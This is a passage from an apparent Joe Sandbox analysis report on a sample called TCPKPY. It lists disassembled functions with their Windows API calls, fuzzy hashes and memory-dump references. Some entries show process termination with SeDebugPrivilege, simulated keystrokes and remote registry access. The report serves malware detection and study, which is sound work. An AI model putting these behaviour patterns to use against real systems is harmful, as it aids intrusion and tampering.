                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: c540f35d751a9d3fbcc9ba354d0308b1e8e43702b6e7d971549ae426ea8f7a5a
                                                                                                                • Instruction ID: 3a6985a486dcb88d6379f1e3e28737e639bb4a17a580098a41add9556cd66832
                                                                                                                • Opcode Fuzzy Hash: c540f35d751a9d3fbcc9ba354d0308b1e8e43702b6e7d971549ae426ea8f7a5a
                                                                                                                • Instruction Fuzzy Hash: AC51C530620215BFEF22AF28DC99F9E3BA5AF06354F204152FA15D62E1D771E9F08B50
                                                                                                                Function 0021A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0027E9EA
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0027EA0B
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0027EA20
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0027EA3D
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0027EA64
                                                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0021A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0027EA6F
                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0027EA8C
                                                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0021A57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0027EA97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268354404-0
                                                                                                                • Opcode ID: 298633b231efe73178f1f917343b66240ceb206e0c043e46d78f6bf3f40a76d3
                                                                                                                • Instruction ID: 807518c769f92719b78c751300d396b8f19aeb4c0ecae47abf6cb3cee937307e
                                                                                                                • Opcode Fuzzy Hash: 298633b231efe73178f1f917343b66240ceb206e0c043e46d78f6bf3f40a76d3
                                                                                                                • Instruction Fuzzy Hash: 2D516B74621205AFDF20DF64DC85FAA77F9BF18350F104619F956972D0D7B0E8A09B60
                                                                                                                Function 0021F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0021F737
                                                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0021F77E
                                                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0027EB55
                                                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0027E9A0,00000004,00000000,00000000), ref: 0027EBC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ShowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1268545403-0
                                                                                                                • Opcode ID: 61e3af2fa5cd5693da81dd9572a264b12e34aa212dcdb00c95a85d7e96ab98f3
                                                                                                                • Instruction ID: 709470845aa11f03a3fbf1dca9b44d10338f7d29d3ba7537ca71bb3bde38b5be
                                                                                                                • Opcode Fuzzy Hash: 61e3af2fa5cd5693da81dd9572a264b12e34aa212dcdb00c95a85d7e96ab98f3
                                                                                                                • Instruction Fuzzy Hash: C84150302346819ADBB45F38AECCAB6FBD57F25305F15586DE06B424F1C6B098E2C721
                                                                                                                Function 00247E6F Relevance: 13.6, APIs: 9, Instructions: 135filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
                                                                                                                  • Part of subcall function 00247C0C: GetFileAttributesW.KERNEL32(?,00246A7B), ref: 00247C0D
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00247ED2
                                                                                                                • _wcscmp.LIBCMT ref: 00247EEA
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00247F03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 4093841705-0
                                                                                                                • Opcode ID: c3fbdedbf734fd018e8f993f70c282bdda2748a29f0e4f4eaf84056005482743
                                                                                                                • Instruction ID: 89386aab219ea43bf6a895c40bb581b7debaee4bb20cdabc8d970aefc92050af
                                                                                                                • Opcode Fuzzy Hash: c3fbdedbf734fd018e8f993f70c282bdda2748a29f0e4f4eaf84056005482743
                                                                                                                • Instruction Fuzzy Hash: BB414471825229AACF25EFA4EC45ADDB3BCAF08310F5045DAF515E3041EB319B99CFA4
                                                                                                                Function 0023CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0023E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0023E158
                                                                                                                  • Part of subcall function 0023E138: GetCurrentThreadId.KERNEL32 ref: 0023E15F
                                                                                                                  • Part of subcall function 0023E138: AttachThreadInput.USER32(00000000,?,0023CDFB,?,00000001), ref: 0023E166
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0023CE06
                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0023CE23
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0023CE26
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0023CE2F
                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0023CE4D
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0023CE50
                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0023CE59
                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0023CE70
                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0023CE73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014098862-0
                                                                                                                • Opcode ID: f1fec23def5fec49fe3a42e9b0597df52c56eebfccd80b53d77367b0aae609ff
                                                                                                                • Instruction ID: 9a1e96456829f0be0b809df689cff5ec77b5b9d4e49b3c99318f5c6261777822
                                                                                                                • Opcode Fuzzy Hash: f1fec23def5fec49fe3a42e9b0597df52c56eebfccd80b53d77367b0aae609ff
                                                                                                                • Instruction Fuzzy Hash: 4C1104B5520618BEFB102FA0AC8EF6A3B2DDF08754F210515F3446B0E0C9F2AC109BA4
                                                                                                                Function 0025C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                • API String ID: 0-572801152
                                                                                                                • Opcode ID: a4585886c9374f5ebff827e1d52612f3c876fb570804301947c603546fa6e5b4
                                                                                                                • Instruction ID: 3f274d4432d7643532086261eee5e4822005a9183672378b7932e69bf936cc29
                                                                                                                • Opcode Fuzzy Hash: a4585886c9374f5ebff827e1d52612f3c876fb570804301947c603546fa6e5b4
                                                                                                                • Instruction Fuzzy Hash: 2CE1D371A2031AAFDF14DF64C881AAE77B5FF48315F244029FD45AB281E7709D68CB94
                                                                                                                Function 00251BFA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
                                                                                                                  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
                                                                                                                  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
                                                                                                                • _wcstok.LIBCMT ref: 00251D6E
                                                                                                                • _wcscpy.LIBCMT ref: 00251DFD
                                                                                                                • _memset.LIBCMT ref: 00251E30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                • String ID: X$t:+p:+
                                                                                                                • API String ID: 774024439-166109747
                                                                                                                • Opcode ID: beb2a219eb6a64fc0a8726f91a311c33a8f564c920d2d6d081ef30957678425c
                                                                                                                • Instruction ID: b9ca27b53a6443dbf8bd1f4bc35ba4502989ef6838a974772b20d96aa327f528
                                                                                                                • Opcode Fuzzy Hash: beb2a219eb6a64fc0a8726f91a311c33a8f564c920d2d6d081ef30957678425c
                                                                                                                • Instruction Fuzzy Hash: C2C16F715283019FC714EF24C881A9BB7E4BF85314F10496DF89A972A2DB70ED69CF92
                                                                                                                Function 00261AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00261B09
                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00261B17
                                                                                                                • __wsplitpath.LIBCMT ref: 00261B45
                                                                                                                  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
                                                                                                                • _wcscat.LIBCMT ref: 00261B5A
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00261BD0
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00261BE2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                • String ID: hE+
                                                                                                                • API String ID: 1380811348-2553741706
                                                                                                                • Opcode ID: 0a0923e4e57803438e1652cb70c4791744cc27aa8d560facf56bcaf5cfa63b79
                                                                                                                • Instruction ID: a07eb8f86ee8267161976491152a3d110a368050c80dcafe7760b680ce9b99d1
                                                                                                                • Opcode Fuzzy Hash: 0a0923e4e57803438e1652cb70c4791744cc27aa8d560facf56bcaf5cfa63b79
                                                                                                                • Instruction Fuzzy Hash: E5518071514300AFD320EF24D885EABB7E8AF88754F14491EF58597291EB30E964CFA2
                                                                                                                Function 00269882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00269926
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 0026993A
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00269954
                                                                                                                • _wcscat.LIBCMT ref: 002699AF
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 002699C6
                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002699F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window_wcscat
                                                                                                                • String ID: SysListView32
                                                                                                                • API String ID: 307300125-78025650
                                                                                                                • Opcode ID: 9d1939ce0d5e124ade51f5943fec363243e3acca739561e05e8b74576c0f74c8
                                                                                                                • Instruction ID: e586534b6eaaf06ef5f2bb3c80766bab5bd5a56abbabf68708c0cc65d7312c58
                                                                                                                • Opcode Fuzzy Hash: 9d1939ce0d5e124ade51f5943fec363243e3acca739561e05e8b74576c0f74c8
                                                                                                                • Instruction Fuzzy Hash: CD41C274A10309ABEF219FA4DC85FEE77ACEF09350F10052AF549A7292D6719DE4CB60
                                                                                                                Function 00261620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00246F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00246F7D
                                                                                                                  • Part of subcall function 00246F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00246F8D
                                                                                                                  • Part of subcall function 00246F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00247022
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026168B
                                                                                                                • GetLastError.KERNEL32 ref: 0026169E
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002616CA
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00261746
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00261751
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00261786
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                • Opcode ID: e2e3879a911191e4c456c92d1b5e0d4d58e3a86113a40369947e305082283416
                                                                                                                • Instruction ID: 846287b888e813be9bf5a9b3ed8b69e009f22f8755b53bdc97508366eca138a5
                                                                                                                • Opcode Fuzzy Hash: e2e3879a911191e4c456c92d1b5e0d4d58e3a86113a40369947e305082283416
                                                                                                                • Instruction Fuzzy Hash: 1441CE75620201AFDB19EF64CCE5FADB7A5AF54314F088048F9069F2D2DBB4A8A4CF51
                                                                                                                Function 00246237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 002462D6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoad
                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                • Opcode ID: 058ce5e34572b6947edb405ce069f01c53ee9352cf32cb2ca474b980775c0fc1
                                                                                                                • Instruction ID: e6e870b87c9ee2407482f170a81234e7fea9915ebfe093acef3387fb3f800292
                                                                                                                • Opcode Fuzzy Hash: 058ce5e34572b6947edb405ce069f01c53ee9352cf32cb2ca474b980775c0fc1
                                                                                                                • Instruction Fuzzy Hash: 3C11EE352283537ED709DE549C4ADAA73AC9F17764B10002AF901666C1F7E069714569
                                                                                                                Function 0024757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00247595
                                                                                                                • LoadStringW.USER32(00000000), ref: 0024759C
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002475B2
                                                                                                                • LoadStringW.USER32(00000000), ref: 002475B9
                                                                                                                • _wprintf.LIBCMT ref: 002475DF
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002475FD
                                                                                                                Strings
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 002475DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                • Opcode ID: ed76fda2cd93f20951d716a7922a0b5e387adb99bfca5744f296ee367cf1a271
                                                                                                                • Instruction ID: fd35b8112976bce0b8c7ff8b43c4b03eadaab36c20f77632426cb5135cb03f69
                                                                                                                • Opcode Fuzzy Hash: ed76fda2cd93f20951d716a7922a0b5e387adb99bfca5744f296ee367cf1a271
                                                                                                                • Instruction Fuzzy Hash: 910162F6500208BFE711ABA4BD8DEEB376CDB04300F4004A2B705D2081EA749E988B70
                                                                                                                Function 00262A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00262AE7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479070676-0
                                                                                                                • Opcode ID: 5db3e5b4926c2d3702e1a56eb37fd67d567cfb6ce6b8642a385cd5d47464b313
                                                                                                                • Instruction ID: b6a2576cf0c14c4a733f2389390af95e5f70b832de6b19b50b5248e3099b8614
                                                                                                                • Opcode Fuzzy Hash: 5db3e5b4926c2d3702e1a56eb37fd67d567cfb6ce6b8642a385cd5d47464b313
                                                                                                                • Instruction Fuzzy Hash: 95915735224601EFCB04EF54C895B6EB7E5EF84314F14880DF5969B2A2DB70E9A9CF42
                                                                                                                Function 0022B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __mtinitlocknum.LIBCMT ref: 0022B744
                                                                                                                  • Part of subcall function 00228A0C: __FF_MSGBANNER.LIBCMT ref: 00228A21
                                                                                                                  • Part of subcall function 00228A0C: __NMSG_WRITE.LIBCMT ref: 00228A28
                                                                                                                  • Part of subcall function 00228A0C: __malloc_crt.LIBCMT ref: 00228A48
                                                                                                                • __lock.LIBCMT ref: 0022B757
                                                                                                                • __lock.LIBCMT ref: 0022B7A3
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,002B6948,00000018,00236C2B,?,00000000,00000109), ref: 0022B7BF
                                                                                                                • EnterCriticalSection.KERNEL32(8000000C,002B6948,00000018,00236C2B,?,00000000,00000109), ref: 0022B7DC
                                                                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 0022B7EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
